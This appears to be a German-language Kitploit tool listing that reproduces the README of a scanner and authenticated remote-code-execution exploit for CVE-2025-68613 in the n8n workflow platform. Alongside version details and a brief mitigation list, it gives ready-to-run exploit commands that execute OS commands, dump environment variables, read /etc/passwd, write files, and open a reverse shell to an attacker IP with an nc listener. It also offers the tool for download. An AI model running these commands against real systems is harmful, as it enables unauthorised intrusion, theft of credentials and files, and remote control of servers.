Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
n8n-cve-2025-68613 — Authentifizierter RCE-Exploit-PoC und Schwachstellen-Scanner für CVE-2025-68613 in n8n. Unterstützt Befehlsausführung, Dateioperationen und Reverse-Shell-Payloads für autorisierte Sicherheitstests. | Kitploit
Tools/GitHubGitHub/gagaltotal/n8n-cve-2025-68613
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and ControlLernen & BildungRemote-Access-ToolPayload-Entwicklung
GitHub
gagaltotal/n8n-cve-2025-68613

n8n-cve-2025-68613

Authentifizierter RCE-Exploit-PoC und Schwachstellen-Scanner für CVE-2025-68613 in n8n. Unterstützt Befehlsausführung, Dateioperationen und Reverse-Shell-Payloads für autorisierte Sicherheitstests.

Repository anzeigenWebseite
10vor 8 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-68613 – n8n Expression-Injection-RCE

Python Security CVE Status

Dieses Toolkit bietet Scanner- und PoC-Exploit-Skripte für die kritische CVE-2025-68613-Schwachstelle in der n8n Workflow Automation Platform.

Dieses Repository enthält Scanner- und PoC-Exploit-Skripte für die kritische CVE-2025-68613-Schwachstelle, die die n8n Workflow Automation Platform betrifft.


WARNUNG / WARNHINWEIS

Indonesisch

Dieses Tool ist NUR für LEGALE und AUTORISIERTE Sicherheitstests gedacht. Die Verwendung dieses Tools auf Systemen ohne Genehmigung des Eigentümers ist verboten.

Englisch

Dieses Tool ist NUR für autorisierte und legale Sicherheitstests gedacht. Unautorisierte Nutzung ist illegal und verboten.


Überblick über die Schwachstelle

  • CVE ID : CVE-2025-68613
  • Schweregrad : Kritisch
  • CVSS : 10.0
  • Typ : Expression-Injection → Remote-Code-Ausführung (RCE)
  • Produkt : n8n Workflow Automation Platform

Verwundbare Versionen

  • 0.211.0 – 1.120.3
  • 1.121.0

Gepatchte Versionen

  • 1.120.4+
  • 1.121.1+
  • 1.122.0+

Repository-Struktur

root@kitploit:~
.
├── tot-scanner-2025-68613.py   # Vulnerability Scanner (NO exploit)
├── tot-exploit-2025-68613.py   # Authenticated RCE Exploit PoC
├── requirements.txt
└── README.md

Scanner (kein Exploit)

Der Scanner wird verwendet für:

  • Erkennung des n8n-Dienstes
  • Extraktion der n8n-Version
  • Bestimmung des Schwachstellenstatus
  • Keine Ausnutzung von Schwachstellen
  • Unterstützung von JSON-Ausgabe

Der Scanner:

  • Erkennt den n8n-Dienst
  • Extrahiert die n8n-Version
  • Bestimmt den Schwachstellenstatus
  • Keine Ausnutzung
  • Unterstützt JSON-Ausgabe

Der Scanner prüft die folgenden Endpunkte:

  • /
  • /rest/settings
  • /healthz
  • /api/v1/health

Abhängigkeiten / Anforderungen

Indonesisch

Benötigte Pakete:

  • requests

Inhalt der Datei requirements.txt:

root@kitploit:~
requests>=2.28.0

Englisch

Erforderliche Pakete:

  • requests

Inhalt von requirements.txt:

root@kitploit:~
requests>=2.28.0

Installation

root@kitploit:~
pip install -r requirements.txt

Verwendung des Scanners

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678

JSON-Modus des Scanners

root@kitploit:~
python3 tot-scanner-2025-68613.py -u http://target.com:5678 --json

Beispiel für die JSON-Ausgabe des Scanners

root@kitploit:~
{
  "target": "http://target.com:5678",
  "detected": true,
  "version": "1.121.0",
  "vulnerable": true,
  "status": "vulnerable",
  "cve": "CVE-2025-68613"
}

Exit-Codes des Scanners

CodeBedeutung
0Nicht verwundbar
1Version unbekannt
2Verwundbar

Exploit-PoC (authentifizierte RCE)

Dieser Exploit ERFORDERT gültige n8n-Anmeldedaten
Authentifizierter Zugriff ist ERFORDERLICH

Der Exploit funktioniert wie folgt:

  1. Anmeldung bei n8n
  2. Erstellen eines Workflows
  3. Einfügen eines schädlichen Ausdrucks in den Set-Knoten
  4. Ausführen des Workflows
  5. (Optional) Bereinigen des Workflows

Exploit-Argumente

ArgumentErforderlichBeschreibung
-u / --url✅Ziel-n8n-URL
-e / --email✅E-Mail-Adresse des n8n-Kontos
-p / --password✅Passwort des n8n-Kontos
--payload✅Payload-Typ
--command❌Betriebssystembefehl (cmd)
--file❌Dateipfad (read/write)
--content❌Dateiinhalt (write)
--lhost❌Angreifer-IP (revshell)
--lport❌Angreifer-Port (revshell)
--verify-ssl❌SSL-Zertifikat verifizieren

Unterstützte Payloads

PayloadFunktion
infoSysteminformationen
cmdBefehlsausführung
envUmgebungsvariablen ausgeben
readDatei lesen
writeDatei schreiben
revshellReverse Shell

Bildschirmaufnahme

Exploit-Beispiele

Systeminformationen

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload info

Befehlsausführung

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload cmd  --command "id"

Datei lesen

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload read  --file /etc/passwd

Datei schreiben

root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload write  --file /tmp/pwned.txt  --content "owned"

Reverse Shell

root@kitploit:~
nc -lvnp 4444
root@kitploit:~
python3 tot-exploit-2025-68613.py  -u http://target.com:5678  -e [email protected]  -p password  --payload revshell  --lhost 10.10.14.5  --lport 4444

Gegenmaßnahmen

  • n8n auf gepatchte Versionen aktualisieren
  • Zugriff auf /rest/*-Endpunkte einschränken
  • RBAC und starke Authentifizierung durchsetzen
  • Unbekannte Workflows prüfen

Haftungsausschluss

Dieses Projekt dient ausschließlich Bildungszwecken und autorisierten Sicherheitstests.
Der Autor ist nicht für Missbrauch verantwortlich.


GitHub-Themen

root@kitploit:~
n8n
cve
cve-2025-68613
rce
expression-injection
security
pentest
red-team
blue-team
python

Bleiben Sie legal. Bleiben Sie ethisch.

Tool herunterladen